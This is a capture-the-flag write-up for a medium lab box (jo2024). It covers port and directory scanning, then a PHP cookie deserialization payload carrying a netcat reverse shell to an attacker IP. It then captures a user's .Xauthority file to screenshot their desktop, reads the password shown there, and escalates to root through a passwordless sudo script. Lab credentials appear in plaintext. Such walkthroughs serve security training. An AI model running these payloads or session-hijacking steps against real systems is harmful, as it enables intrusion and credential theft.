This medium challenge box employed a variety of attacks and techniques, including a PHP Cookie Serialization Attack that leveraged the preferences.php file to gain a reverse shell. Once access was obtained as the www-data user, the .Xauthority file was exploited to capture the vanity user's graphical session, enabling the extraction of sensitive data through a screenshot that revealed their password. Following this, privilege escalation techniques were utilized to run a script as root without a password, allowing for further access to protected content.

Initial nmap scan

└─$ nmap -A -sC -p- 192.168.5.103     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 17:56 EDT
Nmap scan report for 192.168.5.103
Host is up (0.0031s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
|_  256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
80/tcp open  http    Apache httpd 2.4.61 ((Debian))
|_http-server-header: Apache/2.4.61 (Debian)
|_http-title: Paris 2024 Olympic Games
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.20 seconds

Using gobuster we discover preferences.php

└─$ gobuster dir -u http://192.168.5.103 -e -r -x html,htm,asp,aspx,jsp,php,cgi,txt,xml -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.5.103
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              htm,asp,aspx,php,xml,html,cgi,txt,jsp
[+] Follow Redirect:         true
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
...
http://192.168.5.103/img                  (Status: 200) [Size: 2216]
http://192.168.5.103/index.php            (Status: 200) [Size: 7812]
http://192.168.5.103/index.php            (Status: 200) [Size: 7812]
http://192.168.5.103/preferences.php      (Status: 200) [Size: 3163]
http://192.168.5.103/server-status        (Status: 403) [Size: 278]
Progress: 46140 / 46150 (99.98%)
===============================================================
Finished
===============================================================

Going to the preferences.php website:

Using Burp Suite we use the Proxy feature to intercept the traffic when we reload the page:


On the far right side of the window we can modify the Decoded from to gain a reverse shell using a PHP Cookie Serialization Attack:

O:15:"UserPreferences":2:{s:8:"language";s:31:"nc 192.168.5.10 9999 -e /bin/sh";s:15:"backgroundColor";s:4:"#ddd";}

Make sure you replace the IP with your Kali IP address. Also the 31 needs to be modified to match the exact length of the value in the language field.

Click Apply changes then Forward.

Lets get a better shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

We notice that the user vanity is logged in and using x11 / xwindows

www-data@jo2024:/home/vanity$ w
w
 04:24:52 up 14 min,  1 user,  load average: 0.38, 0.27, 0.11
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
vanity   tty7     :0               04:10   14:21   0.00s  0.05s /usr/bin/lxsession -s LXDE -e LXDE

Browse the contents of the vanity user's home folder to discover a "backup" script, which appears to be running every minute as a cron job:

/home/vanity$ cat backup 
#!/bin/bash

SRC="/home/vanity"
DEST="/backup"

rm -rf /backup/{*,.*}

echo "Starting copy..."
find "$SRC" -maxdepth 1 -type f ! -name user.txt | while read srcfile; do
    destfile="$DEST${srcfile#$SRC}"
    mkdir -p "$(dirname "$destfile")"
    dd if="$srcfile" of="$destfile" bs=4M

    md5src=$(md5sum "$srcfile" | cut -d ' ' -f1)
    md5dest=$(md5sum "$destfile" | cut -d ' ' -f1)
    if [[ "$md5src" != "$md5dest" ]]; then
        echo "MD5 mismatch for $srcfile :("
    fi
    chmod 700 "$destfile"

done

echo "Copy complete. All files verified !"

Run a while loop to capture the vanity user's .Xauthority file and save it to /tmp/log, before the permissions are restricted by the user's backup script:

while true; do cat /backup/.Xauthority >> /tmp/log 2>/dev/null;sleep 0.01; done

Set Xauthority environment variable to use our copy of the user's Xauthority file:

export XAUTHORITY=/tmp/log

Take a screenshot of the user's desktop and save it to the /tmp folder:

cd /tmp
xwd -root -screen -silent -display :0 > screenshot.xwd

Start a local python HTTP server to serve the /tmp directory containing the screenshot file:

python3 -m http.server 8888

On Kali, use wget to download the screenshot file from the target system:

└─$ wget http://192.168.10.101:8888/screenshot.xwd

Install the convert tool on Kali, and use it to convert the screenshot file to a .PNG image, and open the image to discover the vanity user's password:

└─$ sudo apt install graphicsmagick-imagemagick-compat
└─$ convert screenshot.xwd screenshot.png
└─$ open screenshot.png

In the screenshot, we can see that the vanity user is viewing a text document with Mousepad, containing the user's password:

Assets/vanity-user-desktop.jpg

We can now login to the system as vanity via SSH, using the credentials vanity:xd0oITR93KIQDbiD :

ssh [email protected]

Run sudo -l to discover that user vanity can run a script named php-server.sh as root:

vanity@jo2024:~$ sudo -l
sudo: unable to resolve host jo2024: Name or service not known
Matching Defaults entries for vanity on jo2024:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User vanity may run the following commands on jo2024:
    (ALL : ALL) NOPASSWD: /usr/local/bin/php-server.sh

View the contents of php-server.sh, then run the script as root:

vanity@jo2024:~$ cat /usr/local/bin/php-server.sh
#!/bin/bash

/usr/bin/php -t /opt -S 0.0.0.0:8000

vanity@jo2024:~$ sudo /usr/local/bin/php-server.sh

Open the web server using the Burpsuite web browser, and view the HTTP response for /get_protected_content.php to discover a password

Use this password LightningBolt123 as the root user's password to gain root access:

vanity@jo2024:~$ su root
Password:
root@jo2024:/home/vanity# id
uid=0(root) gid=0(root) groups=0(root)